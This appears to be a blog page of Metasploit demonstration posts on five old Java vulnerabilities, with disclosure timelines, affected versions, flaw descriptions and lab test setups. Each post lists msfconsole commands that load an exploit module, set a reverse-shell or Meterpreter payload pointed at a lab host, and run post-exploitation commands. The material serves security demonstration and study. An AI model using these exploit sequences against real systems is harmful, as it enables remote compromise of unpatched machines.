Posts tagged Java
CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo
Timeline :
Vulnerability found by Jeroen Frijters
Vulnerability reported to the vendor by Jeroen Frijters the 2011-08-01
Coordinated public release of the vulnerability the 2012-02-14
Details of the vulnerability published by Jeroen Frijters the 2012-02-23
Metasploit PoC provided the 2012-03-29
PoC provided by :
Jeroen Frijters
sinn3r
juan vazquez
egypt
Reference(s) :
CVE-2012-0507
OSVDB-80724
Oracle Java SE Critical Patch Update Advisory – February 2012
Affected version(s) :
Oracle Java SE 7 Update 2 and before
Oracle Java SE 6 Update 30 and before
Oracle Java SE 5.0 Update 33 and before
Tested on Windows XP Pro SP3 with :
Oracle Java SE 6 Update 16
Internet Explorer 8
Description :
This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.
Commands :
use exploit/multi/browser/java_atomicreferencearray
SET SRVHOST 192.168.178.100
SET PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.178.100
exploit
CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo
Timeline :
Vulnerability "ZDI-12-037" reported by Chris Ries to ZDI
Vulnerability "ZDI-12-039" reported by Anonymous to ZDI
Vulnerability reported to the vendor by ZDI the 2011-10-28 for "ZDI-12-037"
Vulnerability reported to the vendor by ZDI the 2011-11-21 for "ZDI-12-039"
Coordinated public release of the vulnerability the 2012-02-22
Metasploit PoC provided the 2012-02-23
PoC provided by :
jduck
Reference(s) :
CVE-2012-0500
OSVDB-79227
ZDI-12-037
ZDI-12-039
TSL20120214-01
Oracle Java SE Critical Patch Update Advisory – February 2012
Affected version(s) :
Oracle Java Development Kit (JDK) 6 Update 30 and prior
Oracle Java Development Kit (JDK) 7 Update 2 and prior
Oracle JavaFX 2.0.2 and prior
Oracle Java Runtime Environment (JRE) 6 Update 30 and prior
Oracle Java Runtime Environment (JRE) 7 Update 2 and prior
Tested on Windows XP Pro SP3 with :
Java 6 Update 30
Internet Explorer 8
Description :
This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.
Commands :
use exploit/windows/browser/java_ws_vmargs
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
sysinfo
getuid
CVE-2010-0842 Java MixerSequencer Vulnerability Metasploit Demo
Timeline :
Vulnerability reported to ZDI by Peter Vreugdenhil
Vulnerability reported to the vendor by ZDI the 2009-12-10
Coordinated public release of the vulnerability the 2010-04-05
Details of the vulnerability and first PoC disclosed the 2010-05-21
Metasploit PoC provided the 2012-02-15
PoC provided by :
Peter Vreugdenhil
juan vazquez
Reference(s) :
CVE-2010-0842
OSVDB-63493
ZDI-10-060
Affected version(s) :
Java 6 before or equal to update 18
Tested on Windows 7 Integral with :
Java 6 Update 18
Internet Explorer 9
Description :
This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation is done by supplying a specially crafted MIDI file within an RMF file. When the MixerSequencer object is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A MIDI block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When triggering the vulnerability, "ebx" points to a fake event in the MIDI file which stores the shellcode. A "jmp ebx" from msvcr71.dll is used to make the exploit reliable across Java updates.
Commands :
use exploit/windows/browser/java_mixer_sequencer
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
sysinfo
getuid
CVE-2011-3544 Java Applet Rhino Script Engine Metasploit Demo
Timeline :
Vulnerability discovered and reported to ZDI by Michael Schierl
Vulnerability reported to vendor by ZDI the 2011-05-12
Coordinated release of the vulnerability the 2011-10-26
First exploit provided by Michael Schierl
Metasploit PoC provided the 2011-11-29
PoC provided by :
Michael Schierl
juan vazquez
Edward D. Teach
sinn3r
Reference(s) :
CVE-2011-3544
OSVDB-76500
ZDI-11-305
Oracle Java SE CPU October 2011
Affected version(s) :
JDK and JRE 7, 6 Update 27 and before
Tested on Windows XP Pro SP3 with :
Java JSE 6 Update 26
Description :
This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example IE, Firefox, Google Chrome, etc.).
Commands :
use exploit/multi/browser/java_rhino
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
getuid
sysinfo
Java RMI Server Insecure Default Configuration Java Code Execution
Timeline :
Vulnerability discovered by mihi
Metasploit exploit released the 2011-07-15
PoC provided by :
mihi
Reference(s) :
Oracle Java RMI documentation
Affected version(s) :
All JSE versions
Tested on Windows XP SP3 with :
JSE 7 (build 1.7.0-b147)
Description :
This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.
Commands :
On Windows target box :
cd C:\Program Files\Java\jre7\bin
start rmiregistry.exe
On Metasploit box :
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.178.48
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig